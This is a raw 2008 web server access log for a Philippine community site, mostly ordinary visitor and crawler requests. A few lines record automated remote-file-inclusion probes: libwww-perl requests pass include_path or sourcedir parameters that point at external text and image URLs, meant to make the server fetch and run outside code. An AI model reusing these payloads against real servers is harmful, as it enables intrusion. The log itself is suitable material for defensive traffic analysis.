121.1.55.18 - - [28/Aug/2008:06:09:59 -0700] "GET /forum2/style_images/red_crysta/lastpost.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:10:00 -0700] "GET /forum2/style_images/red_crysta/user.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:10:00 -0700] "GET /forum2/style_images/red_crysta/bf_new.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:10:00 -0700] "GET /forum2/style_images/red_crysta/calen.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:10:00 -0700] "GET /forum2/style_images/red_crysta/stats.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:10:01 -0700] "GET /forum2/style_images/red_crysta/rss.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:10:02 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
82.99.30.47 - - [28/Aug/2008:06:11:49 -0700] "GET /jodera2/groupcp.php?sid=ccf57776230d00c79ad13f631a3a33b2 HTTP/1.0" 200 17496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:12:07 -0700] "GET /robots.txt HTTP/1.1" 200 44 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:12:30 -0700] "GET /classifieds/index.php?method=create_form&list=classifiedsuser&rollid=18&fromlist=classifiedscategory&frommethod=showhtmllist&fromid=18&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist HTTP/1.0" 200 5718 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:13:04 -0700] "GET /forum2/index.php?act=findpost&hl=&pid=1474 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:13:10 -0700] "GET /forum2/index.php?s=ea485da4ea73d69e317bf460a7453eb0&showtopic=214&st=0&p=1474& HTTP/1.0" 200 13571 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:13:14 -0700] "GET /sampo/flv/073008/2.flv HTTP/1.0" 200 4069886 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:13:40 -0700] "GET /picgallery/displayimage.php?album=27&pos=1 HTTP/1.0" 200 12254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:13:53 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Help HTTP/1.1" 200 3318 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:14:02 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=00 HTTP/1.1" 200 3060 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:14:17 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=10&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
202.128.62.242 - - [28/Aug/2008:06:14:28 -0700] "GET /demolaybacolod/resources/installation.pdf HTTP/1.1" 200 76408 "http://search.yahoo.com/search;_ylt=A0oGkmSPpLZIcvMA7zdXNyoA?p=demolay+installation+suggested+music&fr=yfp-t-501&ei=UTF-8&fp_ip=PH&meta=fl%3D0%26vc%3Dph&rd=adv" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; IEMB3)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:14:30 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61474 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:14:39 -0700] "GET /jodera2/viewforum.php?f=1&sid=496275f23646e6b60740e0ba65f4bc2a HTTP/1.0" 200 83677 "http://www.sancarloscity.org/viewforum.php?f=1&sid=496275f23646e6b60740e0ba65f4bc2a" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:14:51 -0700] "GET /sampo/flv/073008/3.flv HTTP/1.0" 200 10788775 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:14:52 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
217.133.215.166 - - [28/Aug/2008:06:14:52 -0700] "GET /quisumbingsite/guestbook1.htm//guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 788 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:14:53 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
217.133.215.166 - - [28/Aug/2008:06:14:53 -0700] "GET //guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 758 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:14:53 -0700] "GET /jodera2/index.php?sid=496275f23646e6b60740e0ba65f4bc2a HTTP/1.0" 200 54935 "http://www.sancarloscity.org/jodera2/index.php?sid=496275f23646e6b60740e0ba65f4bc2a" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
217.133.215.166 - - [28/Aug/2008:06:14:53 -0700] "GET /quisumbingsite//guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 773 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:14:56 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83723 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:14:58 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:15:03 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=11&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:15:05 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:15:14 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=12&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:15:21 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=13&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:15:27 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=15&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:15:33 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=16&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:15:39 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=17&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:15:45 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=4&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:16:26 -0700] "GET /classifieds/index.php?method=create_form&list=response&rollid=112&fromlist=advertisement&frommethod=showdetails&fromid=112&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=147 HTTP/1.0" 200 5571 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.3 - - [28/Aug/2008:06:16:46 -0700] "GET /jodera2/profile.php?mode=register&sid=c6252426da96e692c81348792cf1008b HTTP/1.0" 200 15267 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:06:16:56 -0700] "GET /forum2/lofiversion/index.php?t213.html HTTP/1.0" 404 748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:17:11 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=5&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:17:12 -0700] "GET /forum2/index.php?showtopic=216 HTTP/1.0" 200 7625 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:17:24 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=7&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:17:32 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=04&f=9&fromforum=0&i=1 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:17:39 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=05 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:17:45 -0700] "GET /sampo/flv/073008/4.flv HTTP/1.0" 200 18402494 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:17:48 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Login&CODE=06 HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
194.135.105.1 - - [28/Aug/2008:06:17:52 -0700] "GET /logs/access_080610.log/?sourcedir=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
194.135.105.1 - - [28/Aug/2008:06:17:53 -0700] "GET /?sourcedir=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 55575 "-" "libwww-perl/5.805" "www.sancarloscity.org"
194.135.105.1 - - [28/Aug/2008:06:17:54 -0700] "GET /logs/?sourcedir=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 62285 "-" "libwww-perl/5.805" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:17:54 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Members HTTP/1.1" 200 7286 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:18:02 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Members&max_results=20&sort_key=posts&sort_order=desc&filter=ALL HTTP/1.1" 200 7384 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:18:08 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Members&max_results=30&filter=7&sort_order=asc&sort_key=members_display_name&st=0&b=1 HTTP/1.1" 200 4657 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:18:14 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Online&CODE=listall&sort_key=click HTTP/1.1" 200 3140 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.111.154.15 - - [28/Aug/2008:06:18:18 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
208.111.154.15 - - [28/Aug/2008:06:18:18 -0700] "GET /picgallery/displayimage.php?album=random&cat=0&pos=-118 HTTP/1.1" 200 13019 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:19 -0700] "GET /forum2/index.php?automodule=blog&blogid=3& HTTP/1.1" 200 11260 "http://www.google.com.sg/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla:en-US:official&q=bacolod+city+local+news&start=30&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:18:20 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Online&CODE=listall&sort_key=name&sort_order=asc&show_mem=reg HTTP/1.1" 200 2865 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:20 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 200 31951 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:21 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 200 6562 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:22 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 200 17304 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:23 -0700] "GET /forum2/jscripts/ips_menu.js HTTP/1.1" 200 6059 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:23 -0700] "GET /forum2/style_images/red_crysta/folder_js_skin/ips_menu_html.js HTTP/1.1" 200 2931 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:24 -0700] "GET /forum2/cache/lang_cache/en/lang_javascript.js HTTP/1.1" 200 2294 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:24 -0700] "GET /forum2/jscripts/ipb_blog.js HTTP/1.1" 200 3710 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:25 -0700] "GET /forum2/jscripts/ips_xmlhttprequest.js HTTP/1.1" 200 3619 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:26 -0700] "GET /forum2/jscripts/ipb_global_xmlenhanced.js HTTP/1.1" 200 5981 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:26 -0700] "GET /forum2/jscripts/dom-drag.js HTTP/1.1" 200 4105 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:27 -0700] "GET /forum2/jscripts/ipb_xhr_findnames.js HTTP/1.1" 200 7486 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:28 -0700] "GET /forum2/jscripts/ipb_blogxml.js HTTP/1.1" 200 25369 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/style_images/red_crysta/loading_anim.gif HTTP/1.1" 200 2800 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/style_images/red_crysta/close.png HTTP/1.1" 200 834 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/blog/dheader_red_crysta_3.png HTTP/1.1" 200 19227 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/style_images/red_crysta/tile_back.gif HTTP/1.1" 200 940 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/style_images/red_crysta/login-button.gif HTTP/1.1" 200 1226 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/style_images/red_crysta/tile_sub.gif HTTP/1.1" 200 1581 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/jscripts/ipb_topic.js HTTP/1.1" 200 14082 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/style_images/red_crysta/tile_sub-lite.gif HTTP/1.1" 200 1511 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:29 -0700] "GET /forum2/style_images/red_crysta/nav.gif HTTP/1.1" 200 113 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:30 -0700] "GET /forum2/style_images/red_crysta/menu_action_down.gif HTTP/1.1" 200 100 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:30 -0700] "GET /forum2/style_images/red_crysta/to_post_off.gif HTTP/1.1" 200 64 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:30 -0700] "GET /forum2/style_images/red_crysta/e_pub.gif HTTP/1.1" 200 78 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:30 -0700] "GET /forum2/style_images/red_crysta/tile_cat.gif HTTP/1.1" 200 2760 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:30 -0700] "GET /forum2/index.php?s=9b334fe97eca4a239a6f98ce1c7065e8&act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:18:31 -0700] "GET /forum2/index.php?showtopic=6&pid=19&mode=threaded&start= HTTP/1.0" 200 8928 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:31 -0700] "GET /favicon.ico HTTP/1.1" 404 747 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:18:34 -0700] "GET /favicon.ico HTTP/1.1" 404 747 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
121.1.44.244 - - [28/Aug/2008:06:18:37 -0700] "GET /quisumbingsite/emiliostory4.htm HTTP/1.1" 200 17215 "http://search.yahoo.com/search?p=etiquette+schools&ei=UTF-8&rd=adv&meta=fl%3D0%26vc%3Dph&fr=yfp-t-501&fr2=sg-gac&fp_ip=PH&xargs=0&pstart=1&b=11" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
121.1.44.244 - - [28/Aug/2008:06:18:38 -0700] "GET /quisumbingsite/antenna.css HTTP/1.1" 200 1674 "http://www.sancarloscity.org/quisumbingsite/emiliostory4.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
121.1.44.244 - - [28/Aug/2008:06:18:38 -0700] "GET /quisumbingsite/autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/quisumbingsite/emiliostory4.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
